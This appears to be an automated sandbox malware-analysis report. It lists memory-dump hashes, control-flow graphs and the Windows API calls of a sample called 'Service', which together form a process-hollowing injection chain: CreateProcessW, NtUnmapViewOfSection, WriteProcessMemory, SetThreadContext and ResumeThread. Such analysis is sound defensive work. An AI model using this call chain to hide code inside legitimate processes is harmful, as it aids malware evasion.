                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a99e2f115cc3eb0678170def1902e553cd3554da42b8e4f4d0baf2daf3c2e734
                                • Instruction ID: f23631a22d01f8e7749dc569f403610aba7213c126ec9dbe694b6909fc88a65e
                                • Opcode Fuzzy Hash: a99e2f115cc3eb0678170def1902e553cd3554da42b8e4f4d0baf2daf3c2e734
                                • Instruction Fuzzy Hash: DA215A75E00309DFDB45EBB8D9446ADBBB6FF88300F104A69E405A7344EB306E44CB52
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f80bb5244779cb20624e4eb8425a90eb220f203ab497ac67422a3db192c5ac48
                                • Instruction ID: 4c761d8954c18d7d9ff653acee3bc181724ebc70c8ca0854b02b60c820777ba9
                                • Opcode Fuzzy Hash: f80bb5244779cb20624e4eb8425a90eb220f203ab497ac67422a3db192c5ac48
                                • Instruction Fuzzy Hash: 93218B30E04248DFCB54EBB8C8557AEBBB2EF85300F1081BDDA0AA7292DB345D14DB85
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be085baaa500363ad0af0bcf965247a4f1b174730cefc9b6f0a86edebb1dc969
                                • Instruction ID: 2bfec45ad4d9dbda8bcaebc35a62e8f6b3969ca2c82c6d30d3e4e12ad68cfd6a
                                • Opcode Fuzzy Hash: be085baaa500363ad0af0bcf965247a4f1b174730cefc9b6f0a86edebb1dc969
                                • Instruction Fuzzy Hash: C021EA369053568FDB02FF28FD80A563BB5FF857067009AA9D4048B36ED7706D4ACB82
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a90b8c79f7aa45b0ff9554171caba199f33aaa967796e82d97c21b08fcaeda5
                                • Instruction ID: 9e4b3804dd4ed4789a3b5ec480c1275816d2f45e9048f44df2d93864a7a44a6a
                                • Opcode Fuzzy Hash: 7a90b8c79f7aa45b0ff9554171caba199f33aaa967796e82d97c21b08fcaeda5
                                • Instruction Fuzzy Hash: D411CB3690035A8FDB42FF28FA80A563BB5FB84706B109A68D4048B32DD7706D49CF82

                                Execution Graph

                                Execution Coverage:31.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:6.1%
                                Total number of Nodes:49
                                Total number of Limit Nodes:4
                                execution_graph 3905 8271d0 3907 8271ea 3905->3907 3906 827239 3907->3906 3910 827288 3907->3910 3916 827279 3907->3916 3911 8272bb 3910->3911 3922 82614c 3911->3922 3913 8274af 3914 82617c NtUnmapViewOfSection 3913->3914 3915 8276ef 3913->3915 3914->3915 3915->3907 3917 8272bb 3916->3917 3918 82614c CreateProcessW 3917->3918 3919 8274af 3918->3919 3921 8276ef 3919->3921 3926 82617c 3919->3926 3921->3907 3923 827ce8 CreateProcessW 3922->3923 3925 827ece 3923->3925 3927 828008 NtUnmapViewOfSection 3926->3927 3928 82809e 3927->3928 3928->3921 3929 8220f0 VirtualAllocEx 3930 8221a7 3929->3930 3897 821ec8 3898 821f26 3897->3898 3899 821f3b Wow64SetThreadContext 3897->3899 3898->3899 3900 821f84 3899->3900 3901 821ba8 3902 821c35 CreateProcessW 3901->3902 3904 821d8e 3902->3904 3931 821fd8 ReadProcessMemory 3932 822097 3931->3932 3933 825f98 3934 825fb2 3933->3934 3935 826001 3934->3935 3938 826450 3934->3938 3942 8261c8 3934->3942 3940 826483 3938->3940 3946 824024 3940->3946 3941 826677 3941->3934 3943 8261cd 3942->3943 3944 824024 CreateProcessW 3943->3944 3945 826677 3944->3945 3945->3934 3947 826eb0 CreateProcessW 3946->3947 3949 827096 3947->3949 3950 822338 ResumeThread 3951 8223c0 3950->3951 3952 8221f8 3953 822261 3952->3953 3954 822276 WriteProcessMemory 3952->3954 3953->3954 3955 8222d8 3954->3955
                                APIs
                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0082808C
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: SectionUnmapView
                                • String ID:
                                • API String ID: 498011366-0
                                • Opcode ID: 4bcb0b3501a8a7e60d6e41a098f0ca6013afa61c87de81ec8cafa95619ae4747
                                • Instruction ID: d4153056bcb0efa783e9a4932f18294e1ff7ac892ef93d2180a59cc17856f343
                                • Opcode Fuzzy Hash: 4bcb0b3501a8a7e60d6e41a098f0ca6013afa61c87de81ec8cafa95619ae4747
                                • Instruction Fuzzy Hash: 373199B4D05218DFCF20CF99E984A9EBBF4FB09310F24901AE814B7310D775A9458FA4
                                APIs
                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0082808C
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: SectionUnmapView
                                • String ID:
                                • API String ID: 498011366-0
                                • Opcode ID: 6a8c3469ea03f9f729f063f982035fe48c23ef135daa250a6e80272b488fccf5
                                • Instruction ID: dfa977223d5c234f052791c93f5bef1594c90208fd917efa8232921a6584ef5b
                                • Opcode Fuzzy Hash: 6a8c3469ea03f9f729f063f982035fe48c23ef135daa250a6e80272b488fccf5
                                • Instruction Fuzzy Hash: 193178B9D012189FCF20CFA9E984A9EFBF5FB49310F24901AE814B7310D775A9498F64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 645 825c6c-825d03 646 825d05-825d17 645->646 647 825d1a-825d28 645->647 646->647 648 825d2a-825d3c 647->648 649 825d3f-825d7b 647->649 648->649 650 825d8f-825e5c CreateProcessW 649->650 651 825d7d-825d8c 649->651 655 825e65-825f24 650->655 656 825e5e-825e64 650->656 651->650 666 825f26-825f4f 655->666 667 825f5a-825f65 655->667 656->655 666->667 671 825f66 667->671 671->671
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825E49
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: d291df9e9b5d80b8f30bd981b3e65caa276041a4fad796c48c002e9a0234a71a
                                • Instruction ID: 6d388bfe471c3e0f9a9a55553f288eb962c33689b03b42330c78f2c93976b590
                                • Opcode Fuzzy Hash: d291df9e9b5d80b8f30bd981b3e65caa276041a4fad796c48c002e9a0234a71a
                                • Instruction Fuzzy Hash: C181D274D0022ADFDB20DFA5D844BDDBBB5BB49300F1091AAE508B7260DB309A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 821b9c-821c33 674 821c35-821c47 672->674 675 821c4a-821c58 672->675 674->675 676 821c5a-821c6c 675->676 677 821c6f-821cab 675->677 676->677 678 821cbf-821d8c CreateProcessW 677->678 679 821cad-821cbc 677->679 683 821d95-821e54 678->683 684 821d8e-821d94 678->684 679->678 694 821e56-821e7f 683->694 695 821e8a-821e95 683->695 684->683 694->695 699 821e96 695->699 699->699
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00821D79
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 063e894a095ed92b47739277b132387c4d90228127e21e8155534e80f59d7838
                                • Instruction ID: ab0d3a3ad4795a22a7de29e85e6402755ce1797f8129939cfd9ab8568002329c
                                • Opcode Fuzzy Hash: 063e894a095ed92b47739277b132387c4d90228127e21e8155534e80f59d7838
                                • Instruction Fuzzy Hash: B981C075D0026ADFDF24CFA5D884BDDBBB1BB59300F1091AAE508B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 700 826ea4-826f3b 701 826f52-826f60 700->701 702 826f3d-826f4f 700->702 703 826f62-826f74 701->703 704 826f77-826fb3 701->704 702->701 703->704 705 826fc7-827094 CreateProcessW 704->705 706 826fb5-826fc4 704->706 710 827096-82709c 705->710 711 82709d-82715c 705->711 706->705 710->711 721 827192-82719d 711->721 722 82715e-827187 711->722 725 82719e 721->725 722->721 725->725
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827081
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 3d3960b58cb8ac10760cab2c55f1cbd884f3f8b103656c88a7f2bbf9ce33ff33
                                • Instruction ID: 691495284093193e6c67c369e82c7d0bc67462e0d033f6c0c76d88de30ef3305
                                • Opcode Fuzzy Hash: 3d3960b58cb8ac10760cab2c55f1cbd884f3f8b103656c88a7f2bbf9ce33ff33
                                • Instruction Fuzzy Hash: 0881BF74D0026ADFDF21CFA5D880BDDBBB5BB49300F1091AAE548B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 824e34-824ecb 728 824ee2-824ef0 727->728 729 824ecd-824edf 727->729 730 824ef2-824f04 728->730 731 824f07-824f43 728->731 729->728 730->731 732 824f57-825024 CreateProcessW 731->732 733 824f45-824f54 731->733 737 825026-82502c 732->737 738 82502d-8250ec 732->738 733->732 737->738 748 825122-82512d 738->748 749 8250ee-825117 738->749 752 82512e 748->752 749->748 752->752
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825011
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 9f4b9d0d532066b221fd33d61f815485fa7d9d88dce540bdf6e6d9d8784c0678
                                • Instruction ID: 6c0d98cde92915a088cc6b591bf1951128c6aefaf77bb4bf261189ecb0d0c5b0
                                • Opcode Fuzzy Hash: 9f4b9d0d532066b221fd33d61f815485fa7d9d88dce540bdf6e6d9d8784c0678
                                • Instruction Fuzzy Hash: 3D81BE75D0026ACFDB21CFA5D940BDEBBF5BB49300F1491AAE508B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 754 824024-826f3b 756 826f52-826f60 754->756 757 826f3d-826f4f 754->757 758 826f62-826f74 756->758 759 826f77-826fb3 756->759 757->756 758->759 760 826fc7-827094 CreateProcessW 759->760 761 826fb5-826fc4 759->761 765 827096-82709c 760->765 766 82709d-82715c 760->766 761->760 765->766 776 827192-82719d 766->776 777 82715e-827187 766->777 780 82719e 776->780 777->776 780->780
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827081
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: af3db5b5e26c1cf12d8da285ea1e6e22a87177b7667b7a496e4e7853ec59a0a5
                                • Instruction ID: 09079a95ef1614d233cf3b34b967b6163fa96aaa90c346a5b371587b79cf60cd
                                • Opcode Fuzzy Hash: af3db5b5e26c1cf12d8da285ea1e6e22a87177b7667b7a496e4e7853ec59a0a5
                                • Instruction Fuzzy Hash: 8A81B075D0026ADFDF21CFA5D840BDEBBB5BB49304F1091AAE508B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 782 82614c-827d73 784 827d75-827d87 782->784 785 827d8a-827d98 782->785 784->785 786 827d9a-827dac 785->786 787 827daf-827deb 785->787 786->787 788 827dff-827ecc CreateProcessW 787->788 789 827ded-827dfc 787->789 793 827ed5-827f94 788->793 794 827ece-827ed4 788->794 789->788 804 827f96-827fbf 793->804 805 827fca-827fd5 793->805 794->793 804->805 808 827fd6 805->808 808->808
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827EB9
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2e3fe77dc81b3f3efd5f102866325f0065d412bcbd5642d76ef9ba9062e72842
                                • Instruction ID: 3d9f6afca1ed74ca3439491f6d38742be9ee8efd871a8286a87355f7108f0f0f
                                • Opcode Fuzzy Hash: 2e3fe77dc81b3f3efd5f102866325f0065d412bcbd5642d76ef9ba9062e72842
                                • Instruction Fuzzy Hash: 6E81CF75D0422ECFDB21DFA5D880BEDBBB5BB49304F1091AAE508B7260DB709A85CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 810 827cdc-827d73 812 827d75-827d87 810->812 813 827d8a-827d98 810->813 812->813 814 827d9a-827dac 813->814 815 827daf-827deb 813->815 814->815 816 827dff-827ecc CreateProcessW 815->816 817 827ded-827dfc 815->817 821 827ed5-827f94 816->821 822 827ece-827ed4 816->822 817->816 832 827f96-827fbf 821->832 833 827fca-827fd5 821->833 822->821 832->833 836 827fd6 833->836 836->836
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827EB9
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 01884379636c0bdebf6d48a985b8a53f8ea74ab5f76d5d50fafd99dff3923db3
                                • Instruction ID: 065d82ce4c2d9fc72ebf5add79ec5fdf43bf25b6ad984d524e56d31a1fb72335
                                • Opcode Fuzzy Hash: 01884379636c0bdebf6d48a985b8a53f8ea74ab5f76d5d50fafd99dff3923db3
                                • Instruction Fuzzy Hash: 7E81C275D0022ECFDB21CFA5D880BDDBBB5BB49300F1091AAE508B7260DB309A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 838 821ba8-821c33 839 821c35-821c47 838->839 840 821c4a-821c58 838->840 839->840 841 821c5a-821c6c 840->841 842 821c6f-821cab 840->842 841->842 843 821cbf-821d8c CreateProcessW 842->843 844 821cad-821cbc 842->844 848 821d95-821e54 843->848 849 821d8e-821d94 843->849 844->843 859 821e56-821e7f 848->859 860 821e8a-821e95 848->860 849->848 859->860 864 821e96 860->864 864->864
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00821D79
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 941e73c0cc1b41af1eabf18c80e4648c2ccd42abea79ca6cdbf9de0f0cef0499
                                • Instruction ID: 8cdf15c9ba7b296901e51637ef3533314eaef691a420a7fedf0d9475e1be58da
                                • Opcode Fuzzy Hash: 941e73c0cc1b41af1eabf18c80e4648c2ccd42abea79ca6cdbf9de0f0cef0499
                                • Instruction Fuzzy Hash: 7281C175D00229DFDF24CFA5D884BDDBBB5BB49300F1091AAE508B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 892 825c78-825d03 893 825d05-825d17 892->893 894 825d1a-825d28 892->894 893->894 895 825d2a-825d3c 894->895 896 825d3f-825d7b 894->896 895->896 897 825d8f-825e5c CreateProcessW 896->897 898 825d7d-825d8c 896->898 902 825e65-825f24 897->902 903 825e5e-825e64 897->903 898->897 913 825f26-825f4f 902->913 914 825f5a-825f65 902->914 903->902 913->914 918 825f66 914->918 918->918
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825E49
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 45c40116e406df6c6df1c484dd96a45241ca0446e83139ff8400b2342b2c96b5
                                • Instruction ID: 9ac6611a154868e6606d1371197ed231ea83f104281de876e4dfe3a6ccb68463
                                • Opcode Fuzzy Hash: 45c40116e406df6c6df1c484dd96a45241ca0446e83139ff8400b2342b2c96b5
                                • Instruction Fuzzy Hash: 5681B175D0022ADFDB20DFA5D844BDEBBF5BB49300F1091AAE508B7260DB709A89CF54

                                Control-flow Graph (graph image not preserved; legend: Executed / Not Executed). Blocks span 824e40-82512e; block 824f57-825024 contains the CreateProcessW call.
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825011
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: b3d95b2a96aae82549dc512c77b292ecab784d06d78cbff1e41bf133e7e639ee
                                • Instruction ID: f912d009f3889d8f6cf0f91fea935c0255da64c47311c27c49a66ff6de06db3d
                                • Opcode Fuzzy Hash: b3d95b2a96aae82549dc512c77b292ecab784d06d78cbff1e41bf133e7e639ee
                                • Instruction Fuzzy Hash: 4181BF75D0026ACFDB21CFA5D940BDEBBF5BB49300F1491AAE508B7260DB709A89CF54
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 008222C6
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 09057e7f7e6e2f46411dd9696d61f0c056ca57f37cdd1058f3fa725d4cff6d2f
                                • Instruction ID: 277b3b6ec8cc6c86a1306609843159ad02f84cce6765a5e1407288ac62c51cdd
                                • Opcode Fuzzy Hash: 09057e7f7e6e2f46411dd9696d61f0c056ca57f37cdd1058f3fa725d4cff6d2f
                                • Instruction Fuzzy Hash: 104177B5D042589FCB10CFA9E984ADEFBF1FB49314F24902AE818B7250D375AA45CF64
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 008222C6
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 4522f01a0dceb4ae6c55cec287272b2f83e9d2bdb4639593f7872e091eb0ee00
                                • Instruction ID: 9966664c6a736a5872c62d1fe14b0a510fc651d74ee8c3e7630861a3bf8ab457
                                • Opcode Fuzzy Hash: 4522f01a0dceb4ae6c55cec287272b2f83e9d2bdb4639593f7872e091eb0ee00
                                • Instruction Fuzzy Hash: BF4166B5D04258DFCB10CFA9D984ADEFBF1FB49310F24902AE818B7210D375AA45CB64
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00822085
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0f8dac68c7504e813c658f34c68a37a883b89f1557401783d572fdcf18ea8517
                                • Instruction ID: aacf7a40fc7eac6b1cc4d77a8802a19b5961fd266018b2695c96d7ded977a9f5
                                • Opcode Fuzzy Hash: 0f8dac68c7504e813c658f34c68a37a883b89f1557401783d572fdcf18ea8517
                                • Instruction Fuzzy Hash: DA4178B9D04258DFCF10CFAAE984ADEFBB1BB19310F14A02AE814B7210C375A945CF64
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00822195
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 1bd1b595fe84964b3939dab2a57fe51abc31e8b04ad4ed3fb0fa85324129d852
                                • Instruction ID: 348f6ffadfc299bc86c220a41cef3f861c2d4f7efac0a081ccf137e7a3b7ba07
                                • Opcode Fuzzy Hash: 1bd1b595fe84964b3939dab2a57fe51abc31e8b04ad4ed3fb0fa85324129d852
                                • Instruction Fuzzy Hash: 983176B8D042589FCF10CFA9E884ADEFBB1BB49310F10A41AE914BB210D375A946CF64
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00822085
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c2e1141e5563d91ee1a199b24d75a95794e24c185232a01144411404c6f0f276
                                • Instruction ID: 836d35e45bfc39834b4cd0583ed3c1019548a9ff9dfa2c9ba11a8e2833ded188
                                • Opcode Fuzzy Hash: c2e1141e5563d91ee1a199b24d75a95794e24c185232a01144411404c6f0f276
                                • Instruction Fuzzy Hash: AD3168B9D042599FCF10CFAAD984ADEFBB5BB19310F10A02AE814B7210D375A945CF69
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00822195
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b67f879b9f0a6aeee546f0dee4361c590913aa985b779c1e6ec331b34dc18d43
                                • Instruction ID: 7e85a3b6caaffcea37ed85ca316a511fd9e9204cdc7db90e7148eb077608f023
                                • Opcode Fuzzy Hash: b67f879b9f0a6aeee546f0dee4361c590913aa985b779c1e6ec331b34dc18d43
                                • Instruction Fuzzy Hash: D03174B9D04258AFCF10CFA9E884ADEFBB5BB09310F10A02AE914B7310D375A945CF64
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00821F72
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 7b07afb4fe7ff6e921c594ceffb169bd30d2713ca73e2a566141ea255de4f68a
                                • Instruction ID: 992f859b368f49f95e616fd0b6b0d625daed5539a817808403196962462d82be
                                • Opcode Fuzzy Hash: 7b07afb4fe7ff6e921c594ceffb169bd30d2713ca73e2a566141ea255de4f68a
                                • Instruction Fuzzy Hash: 8A31CAB5D012589FCF14CFAAD984ADEFBF1BB49314F24802AE418B7250C778AA45CF64
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00821F72
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: eeda3ff5a458ae5168ec607a059214681fc4dc41de34a8dca6e92276acdaebab
                                • Instruction ID: 00002c08374f88491219d93785a8eec108ef82ae7d6bb01548e91d6d62a9b6fd
                                • Opcode Fuzzy Hash: eeda3ff5a458ae5168ec607a059214681fc4dc41de34a8dca6e92276acdaebab
                                • Instruction Fuzzy Hash: 0631AAB5D012589FCF10CFAAD984ADEFBF1BB49310F24802AE414B7210C778AA45CF64
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 008223AE
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: a1ebf1bdffb48a42a9da3490c8cf763d5283540e37f53bc167278b0c445c0d30
                                • Instruction ID: 944643d5ff92fc96c67968cb1ee4cde3f610b6b8eef5609ccf0b19b0323b5cc2
                                • Opcode Fuzzy Hash: a1ebf1bdffb48a42a9da3490c8cf763d5283540e37f53bc167278b0c445c0d30
                                • Instruction Fuzzy Hash: 202189B4D002199FCB20CFA9D484ADEFBF4BB49310F24905AE814B7310C375A945CFA4
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 008223AE
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 4696c8cf2dcca91a3a6dce1ed99707b76fd6ec183ad48b7bb6e7f1ebf85e6239
                                • Instruction ID: 4094da9b44144b931e44350368f37107ae351a2ee1e714836923ebc31030c5cb
                                • Opcode Fuzzy Hash: 4696c8cf2dcca91a3a6dce1ed99707b76fd6ec183ad48b7bb6e7f1ebf85e6239
                                • Instruction Fuzzy Hash: 812188B8D002199FCB10CFA9D484ADEFBF4BB49320F24901AE918B7310D375A945CFA4
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd